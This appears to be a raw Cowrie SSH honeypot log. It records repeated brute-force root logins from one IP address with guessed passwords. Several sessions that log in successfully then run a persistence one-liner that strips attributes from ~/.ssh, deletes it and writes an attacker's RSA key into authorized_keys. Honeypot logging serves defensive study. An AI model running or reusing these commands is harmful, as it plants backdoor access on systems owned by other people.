{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:26:18.767439Z","src_ip":"212.227.235.229","session":"5e19b09845a9"}
{"eventid":"cowrie.login.failed","username":"default","password":"abc123","message":"login attempt [default/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:26:20.044069Z","src_ip":"212.227.235.229","session":"5e19b09845a9"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:26:21.354135Z","src_ip":"212.227.235.229","session":"5e19b09845a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36012,"dst_ip":"1.2.3.4","dst_port":22,"session":"07f833aaa493","protocol":"ssh","message":"New connection: 212.227.235.229:36012 (1.2.3.4:22) [session: 07f833aaa493]","sensor":"my-vps","timestamp":"2025-09-09T01:26:25.670630Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:26:25.671529Z","src_ip":"212.227.235.229","session":"07f833aaa493"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:26:25.894310Z","src_ip":"212.227.235.229","session":"07f833aaa493"}
{"eventid":"cowrie.login.success","username":"root","password":"Kong@2022","message":"login attempt [root/Kong@2022] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:26:26.787934Z","src_ip":"212.227.235.229","session":"07f833aaa493"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:26:27.283533Z","src_ip":"212.227.235.229","session":"07f833aaa493"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:26:27.284182Z","src_ip":"212.227.235.229","session":"07f833aaa493"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:26:27.285256Z","src_ip":"212.227.235.229","session":"07f833aaa493"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:26:27.510066Z","src_ip":"212.227.235.229","session":"07f833aaa493"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:26:27.979961Z","src_ip":"212.227.235.229","session":"07f833aaa493"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:26:27.980672Z","src_ip":"212.227.235.229","session":"07f833aaa493"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:26:28.206394Z","src_ip":"212.227.235.229","session":"07f833aaa493"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:26:28.207239Z","src_ip":"212.227.235.229","session":"07f833aaa493"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36501,"dst_ip":"1.2.3.4","dst_port":22,"session":"82bc2afeed53","protocol":"ssh","message":"New connection: 212.227.235.229:36501 (1.2.3.4:22) [session: 82bc2afeed53]","sensor":"my-vps","timestamp":"2025-09-09T01:26:28.439965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:26:28.440828Z","src_ip":"212.227.235.229","session":"82bc2afeed53"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:26:28.674025Z","src_ip":"212.227.235.229","session":"82bc2afeed53"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:26:29.648936Z","src_ip":"212.227.235.229","session":"82bc2afeed53"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:26:30.885747Z","src_ip":"212.227.235.229","session":"82bc2afeed53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37016,"dst_ip":"1.2.3.4","dst_port":22,"session":"73d7b091fea9","protocol":"ssh","message":"New connection: 212.227.235.229:37016 (1.2.3.4:22) [session: 73d7b091fea9]","sensor":"my-vps","timestamp":"2025-09-09T01:26:31.123667Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:26:31.124316Z","src_ip":"212.227.235.229","session":"73d7b091fea9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:26:31.364085Z","src_ip":"212.227.235.229","session":"73d7b091fea9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:26:32.364684Z","src_ip":"212.227.235.229","session":"73d7b091fea9"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:26:32.605627Z","src_ip":"212.227.235.229","session":"07f833aaa493"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:26:32.606451Z","src_ip":"212.227.235.229","session":"73d7b091fea9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33492,"dst_ip":"1.2.3.4","dst_port":22,"session":"49f10e4b9907","protocol":"ssh","message":"New connection: 212.227.235.229:33492 (1.2.3.4:22) [session: 49f10e4b9907]","sensor":"my-vps","timestamp":"2025-09-09T01:26:39.852187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:26:39.852941Z","src_ip":"212.227.235.229","session":"49f10e4b9907"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:26:40.118104Z","src_ip":"212.227.235.229","session":"49f10e4b9907"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123321","message":"login attempt [root/Aa123321] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:26:41.213419Z","src_ip":"212.227.235.229","session":"49f10e4b9907"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:26:41.761097Z","src_ip":"212.227.235.229","session":"49f10e4b9907"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:26:41.761897Z","src_ip":"212.227.235.229","session":"49f10e4b9907"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:26:41.762753Z","src_ip":"212.227.235.229","session":"49f10e4b9907"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:26:42.028265Z","src_ip":"212.227.235.229","session":"49f10e4b9907"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:26:42.651848Z","src_ip":"212.227.235.229","session":"49f10e4b9907"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:26:42.652682Z","src_ip":"212.227.235.229","session":"49f10e4b9907"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:26:42.919097Z","src_ip":"212.227.235.229","session":"49f10e4b9907"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:26:42.920103Z","src_ip":"212.227.235.229","session":"49f10e4b9907"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34684,"dst_ip":"1.2.3.4","dst_port":22,"session":"70a5e38957d7","protocol":"ssh","message":"New connection: 212.227.235.229:34684 (1.2.3.4:22) [session: 70a5e38957d7]","sensor":"my-vps","timestamp":"2025-09-09T01:26:43.206691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:26:43.221440Z","src_ip":"212.227.235.229","session":"70a5e38957d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:26:43.482345Z","src_ip":"212.227.235.229","session":"70a5e38957d7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:26:44.528615Z","src_ip":"212.227.235.229","session":"70a5e38957d7"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:26:45.793443Z","src_ip":"212.227.235.229","session":"70a5e38957d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35534,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd19cf7f3a95","protocol":"ssh","message":"New connection: 212.227.235.229:35534 (1.2.3.4:22) [session: cd19cf7f3a95]","sensor":"my-vps","timestamp":"2025-09-09T01:26:46.053018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:26:46.054241Z","src_ip":"212.227.235.229","session":"cd19cf7f3a95"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:26:46.315038Z","src_ip":"212.227.235.229","session":"cd19cf7f3a95"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:26:47.396932Z","src_ip":"212.227.235.229","session":"cd19cf7f3a95"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:26:47.659033Z","src_ip":"212.227.235.229","session":"cd19cf7f3a95"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:26:47.664542Z","src_ip":"212.227.235.229","session":"49f10e4b9907"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42690,"dst_ip":"1.2.3.4","dst_port":22,"session":"3dd82dc819f1","protocol":"ssh","message":"New connection: 212.227.235.229:42690 (1.2.3.4:22) [session: 3dd82dc819f1]","sensor":"my-vps","timestamp":"2025-09-09T01:27:00.118907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:27:00.119818Z","src_ip":"212.227.235.229","session":"3dd82dc819f1"}
